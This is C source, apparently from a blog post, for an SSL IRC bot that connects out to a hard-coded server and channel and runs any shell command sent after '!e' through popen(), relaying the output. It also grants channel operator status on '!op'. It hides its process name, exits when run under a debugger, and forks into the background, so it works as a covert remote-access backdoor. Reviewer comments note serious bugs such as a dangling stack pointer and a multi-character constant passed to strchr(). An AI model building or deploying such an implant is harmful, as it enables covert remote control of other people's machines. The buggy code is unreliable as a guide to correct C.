/*
* An SSL IRC bot that will run some commands on the host, useful for running
* john on your linux box via irc during a pentest - cheap man's VPN ;)
*
* Has a couple of little bugs which I might fix, but it serves its simple purpose.
*
* You should change the stuff in SSLTYPE1 & SSLTYPE2 to match your own box, I
* just added that as a test to see if it would tell if a MITM was present.
*
*/
#include < stdio.h > // You will have to fix these spaces, blogspot's fault.
#include < string.h >
#include < unistd.h >
#include < arpa/inet.h >
#include < sys/ptrace.h >
#include < sys/socket.h >
#include < sys/types.h >
#include < resolv.h >
#include < netdb.h >
#include < openssl/ssl.h >
#include < openssl/err.h >
/* Build-time configuration; every value below is compiled into the binary as a plain string or integer. */
// Text that must appear somewhere in a received line before "!op" / "!e" are acted on (see srvconn).
#define OWNER "x0ng@i.r.steppin.down"
// Nick and user name sent in the NICK / USER registration lines.
#define NICK "ruxxbot"
#define USER "ruxxbot"
// Channel joined after registration, written without the leading '#'.
#define CHAN "home"
// Host name resolved in main() and echoed back in PONG replies.
#define SERV "nodefense.org"
#define PASS "" //channel password
// TCP port used for the outbound connection.
#define PORT 65531
// String copied over argv[0] in main().
#define LABEL "t3hrUxx0r"
// Cipher name and protocol string that the header comment says to adjust;
// srvssl() tests the negotiated values against these same strings.
#define SSLTYPE1 "AES256-SHA"
#define SSLTYPE2 "TLSv1i/SSLv3"
// Size of the heap buffers used to format outgoing IRC lines.
#define BSIZE 80
/*
 * Initialise the OpenSSL library and build a client-side SSL_CTX.
 *
 * Returns whatever SSL_CTX_new() produced; the result is not checked here,
 * so the caller receives NULL if context creation failed.
 *
 * Nothing in this function sets a verify mode or loads a CA store, so the
 * context is left at the library defaults for peer-certificate handling.
 */
SSL_CTX*
initctx(void)
{
    SSL_library_init();
    OpenSSL_add_all_algorithms();

    /* The "v23" method lets client and server negotiate the protocol version. */
    return SSL_CTX_new(SSLv23_client_method());
}
/*
 * Write the NUL-terminated string msg to the TLS connection.
 *
 * The process is terminated with status 1 when SSL_write() reports that
 * fewer than one byte was written.
 */
void
srvsend(SSL *ssl, char *msg)
{
    int written = SSL_write(ssl, msg, strlen(msg));

    if (written < 1) {
        exit(1);
    }
}
/*
* Read one chunk (at most 4095 bytes) from the TLS connection, reply with a
* PONG if the chunk contains "PING", and return a pointer to the text read.
*
* The process exits with status 1 when SSL_read() returns 0, or when the text
* in buf is empty or longer than 2047 characters.
*
* NOTE(review): the returned pointer is the address of the local array buf.
* Its lifetime ends when this function returns, so any use of the result by
* the caller is undefined behaviour.
*/
char *
srvread(SSL *ssl)
{
int bytes;
char buf[4096] = {0};
// NOTE(review): the allocation result is not checked for NULL before it is used below.
char * msgbuf = (char *)malloc(BSIZE);
char * ret = NULL;
bytes = SSL_read(ssl, buf, sizeof(buf)-1);
// Only a return value of exactly 0 is tested; negative (error) returns are not distinguished here.
if(!bytes)
exit(1);
if((strlen(buf) > 2047) || strlen(buf) < 1)
exit(1);
// After the check above strlen(buf) is at most 2047, so this store does not shorten the text.
buf[2047] = '\0';
// strstr() matches "PING" anywhere in the chunk, not only at the start of a line.
if(strstr(buf, "PING")) {
sleep(2);
memset(msgbuf, 0, BSIZE);
// The size argument is derived from strlen(SERV) rather than from the BSIZE allocation.
// "PONG :" + SERV + "\r\n" needs strlen(SERV) + 9 bytes with the terminator, so with
// strlen(SERV) + 8 the final '\n' is cut off.
snprintf(msgbuf, strlen(SERV) + 8, "PONG :%s\r\n", SERV);
srvsend(ssl, msgbuf);
}
free(msgbuf);
msgbuf = NULL;
// Hands back the address of a stack array (see the note in the header comment).
ret = buf;
return ret;
}
/*
* Take the text found after a "!e" marker in a received line, pass it to
* popen(), and relay each line of the command's output to the channel as a
* PRIVMSG.
*
* ssl    - connection the output is written to.
* cmdptr - pointer into the received line, positioned at "!e" by the caller.
*
* Security-relevant behaviour visible here:
*  - The string handed to popen() comes straight from the network message and
*    is interpreted by the shell; nothing in this function restricts which
*    commands may run.
*  - The three early returns below leave without freeing cmdbuf.
*/
void
runcmd(SSL *ssl, char * cmdptr)
{
char buf[256] = {0};
// NOTE(review): the allocation result is not checked before memset() writes to it.
char * cmdbuf = (char *)malloc(2048);
char * lol = NULL;
FILE * sys = NULL;
memset(cmdbuf, 0, 2048);
if((strlen(cmdptr) > 256) || (strlen(cmdptr) < 1))
return;
// NOTE(review): '!e ' is a multi-character constant, not a string. Its value is
// implementation-defined and strchr() converts it to a single char, so this does
// not search for the three-character sequence.
lol = strchr(cmdptr, '!e ');
if(!lol)
return;
// Drops the last two characters of the text (presumably the trailing "\r\n").
// NOTE(review): if strlen(lol) is below 2 the index wraps around and the store is out of bounds.
lol[strlen(lol)-2] = '\0';
sys = popen(lol, "r");
if(!sys)
return;
while(fgets(buf, sizeof(buf)-1, sys)) {
// The size argument adds strlen(OWNER) although OWNER is not part of the format;
// it is not tied to the 2048-byte allocation either.
snprintf(cmdbuf, strlen(buf) + strlen(OWNER) + 11, "PRIVMSG #%s %s\n", CHAN, buf);
srvsend(ssl, cmdbuf);
}
free(cmdbuf);
cmdbuf = NULL;
pclose(sys);
}
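/*
 * Send a MODE line asking the server to give channel-operator status to the
 * hard-coded nick on #CHAN.
 *
 * The line is formatted into a BSIZE-byte heap buffer. The bound passed to
 * snprintf() is the allocation size itself, so the write cannot run past the
 * buffer whatever the length of CHAN, and the trailing '\n' is no longer cut
 * off by a bound that was one byte short. Nothing is sent if the allocation
 * fails or the formatted line does not fit.
 */
void
op(SSL *ssl)
{
    char *opbuf = malloc(BSIZE);
    int len;

    if (!opbuf)
        return;

    len = snprintf(opbuf, BSIZE, "MODE #%s +o x0ng\n", CHAN);
    /* Send only a complete line: len >= BSIZE means snprintf() truncated it. */
    if (len > 0 && len < BSIZE)
        srvsend(ssl, opbuf);

    free(opbuf);
}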
/*
* Register with the IRC server (NICK, USER, JOIN) and then loop forever,
* reading from the connection and dispatching "!op" and "!e" requests.
*
* A request is acted on when the received text contains the OWNER string.
* NOTE(review): that test is a strstr() over the whole chunk, so it passes
* wherever the OWNER text appears in it; it is a substring match, not a check
* of the message's sender field.
*/
void
srvconn(SSL *ssl)
{
char * cmd = NULL;
char * cmdptr = NULL;
// NOTE(review): the allocation result is not checked for NULL before use.
char * msgbuf = (char *)malloc(BSIZE);
struct set
{
char * chan;
char * pass;
char * user;
char * nick;
} irc;
irc.chan = CHAN;
irc.user = USER;
irc.nick = NICK;
irc.pass = PASS;
// NOTE(review): the conditions are joined with &&, so this exits only when all four
// strings are longer than 15 characters; a single over-long value is not rejected.
if(strlen(irc.chan) > 15 && strlen(irc.pass) > 15 && strlen(irc.user) > 15 && strlen(irc.nick) > 15)
exit(1);
// In the three snprintf() calls below the size argument is computed from the string
// lengths, not from the BSIZE allocation, and each is one byte short of the formatted
// line plus terminator, so the final '\n' of "\r\n" is dropped.
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.nick)+7, "NICK %s\r\n", irc.nick);
srvsend(ssl, msgbuf);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.user) + strlen(irc.user) + strlen(irc.user) + strlen(irc.user) + 11, "USER %s %s %s :%s\r\n", irc.user, irc.user, irc.user, irc.user);
srvsend(ssl, msgbuf);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.chan) + strlen(irc.pass) + 9, "JOIN #%s %s\r\n", irc.chan, irc.pass);
srvsend(ssl, msgbuf);
for(;;) {
// NOTE(review): srvread() returns the address of one of its own local arrays, so cmd
// refers to storage that is no longer valid by the time it is read here.
cmd = srvread(ssl);
//printf("\n%s\n", cmd); // Debug
if((cmdptr = strstr(cmd, OWNER))) {
// Both markers are tested independently, so one chunk can trigger both actions.
if((cmdptr = strstr(cmd,"!op"))) {
op(ssl);
}
if((cmdptr = strstr(cmd,"!e"))) {
runcmd(ssl, cmdptr);
}
}
}
// Not reached: the loop above has no exit.
free(msgbuf);
msgbuf = NULL;
}
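/*
 * Compare the negotiated cipher name and protocol string with SSLTYPE1 and
 * SSLTYPE2, so that editing those two macros actually changes what is
 * checked (the literals were previously duplicated here).
 *
 * Returns 1 when both expected strings are found and -1 otherwise. Both
 * values are non-zero, so a caller has to compare against 1 (or test > 0);
 * a plain truth test accepts the mismatch case as well.
 *
 * The comparison looks only at which cipher suite and protocol label were
 * negotiated. It does not examine the server certificate, so on its own it
 * does not establish who the peer is.
 *
 * NOTE(review): SSLTYPE2 as defined may contain a stray character; confirm
 * it against the string the library reports for the connection.
 */
int
srvssl(SSL *ssl)
{
    const char *cipher = SSL_get_cipher_name(ssl);
    const char *proto = SSL_get_cipher_version(ssl);

    /* Treat a missing name as a mismatch instead of passing NULL to strstr(). */
    if (!cipher || !proto)
        return -1;

    if (!strstr(cipher, SSLTYPE1) || !strstr(proto, SSLTYPE2))
        return -1;

    return 1;
}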
/*
* Entry point: resolve SERV, create the socket and TLS objects, fork, and let
* the child connect and run the IRC loop while the parent cleans up and
* returns straight away.
*
* None of gethostbyname(), socket(), initctx(), SSL_new(), fork(), connect()
* or SSL_connect() has its result checked for failure.
*/
int
main(int argc, char * argv[])
{
// PTRACE_TRACEME fails when the process is already being traced, so the program
// exits at start-up when it is run under a tracer such as a debugger or strace.
if (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1)
exit(1);
int conx, sock, port = PORT;
struct sockaddr_in sout;
struct hostent *he;
SSL_CTX *ctx;
SSL *ssl;
pid_t pid;
// Overwrites the program name in place, so tools that display the argument vector
// show LABEL instead; this does not change the executable path the kernel records.
// NOTE(review): strcpy() writes strlen(LABEL) + 1 bytes however short the original
// argv[0] was.
strcpy(argv[0], LABEL);
he = gethostbyname(SERV);
bzero((char *)&sout, sizeof(sout));
sout.sin_family = AF_INET;
sout.sin_port = htons(port);
// NOTE(review): he is dereferenced without a NULL check, so a failed lookup crashes here.
memcpy(&sout.sin_addr.s_addr, he->h_addr, he->h_length);
sock = socket(AF_INET, SOCK_STREAM, 0);
ctx = initctx();
ssl = SSL_new(ctx);
// Only the child (pid == 0) connects; the parent, and also the pid == -1 failure case,
// falls through to the cleanup below.
pid = fork();
if(pid == 0) {
// conx is assigned but never read, so a failed connect() goes unnoticed.
conx = connect(sock, (struct sockaddr *)&sout, sizeof(sout));
SSL_set_fd(ssl, sock);
SSL_connect(ssl);
// srvssl() returns 1 or -1; both are non-zero, so this condition is always true and
// the cipher comparison never prevents srvconn() from running.
if(srvssl(ssl))
srvconn(ssl);
}
close(sock);
SSL_free(ssl);
SSL_CTX_free(ctx);
return 0;
}